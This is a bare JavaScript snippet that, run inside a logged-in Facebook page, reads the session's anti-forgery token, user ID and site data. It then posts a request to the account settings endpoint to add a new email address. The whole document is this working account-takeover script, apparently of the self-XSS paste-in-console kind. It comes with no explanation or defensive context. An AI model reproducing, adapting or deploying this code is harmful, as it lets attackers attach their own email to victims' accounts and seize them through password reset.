var spinR = require(["SiteData"]).__spin_r;
var spinB = require(["SiteData"]).__spin_b;
var spinT = require(["SiteData"]).__spin_t;
var jazoest = require(["SprinkleConfig"]).jazoest;
var fbdtsg = require(["DTSGInitData"]).token;
var userId = require(["CurrentUserInitialData"]).USER_ID;
var hsi = require(["SiteData"]).hsi;
var email = "hotmail";
var url = "https://www.facebook.com/settings/email/add/submit/";
var data = "cquick_token=AQ7uWrCfehh4EfBVanE&ctarget=https%3A%2F%2Fwww.facebook.com&cquick=jsc_c_r&jazoest=25490&fb_dtsg="+fbdtsg+"&new_email="+email+"&qp_h=&source_added=web_settings&__user="+userId+"&__a=1&__dyn=7xeUmBwjbg7ebwKheC1swgE98nwgU6C7UW3q327E2vzobo1nEhwem0Ko2_CwjE28wgo2WxO0FE5_wEwt81sbzo5-1uwbe2l2Utwwwi8188fo2IwKw9O0RE5a1qw8W1uwa-7U1mUdEGdw46wbS1Lwqo2Yw&__csr=&__req=8&__hs=19276.BP%3ADEFAULT.2.0.0.0.0&dpr=1&__ccg=MODERATE&__rev=1006364963&__s=c0mh7e%3Aw2s84x%3Aedcmbc&__hsi=7153358665472118705&__comet_req=0&lsd=cy90BXkrw4knck1omrECOk&__aaid=1056199935112502&__spin_r=1006364963&__spin_b=trunk&__spin_t=1665521102";
fetch(url, {
    method: 'POST',
    body: data,
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
}).then(e => e.text()).then(e => {})
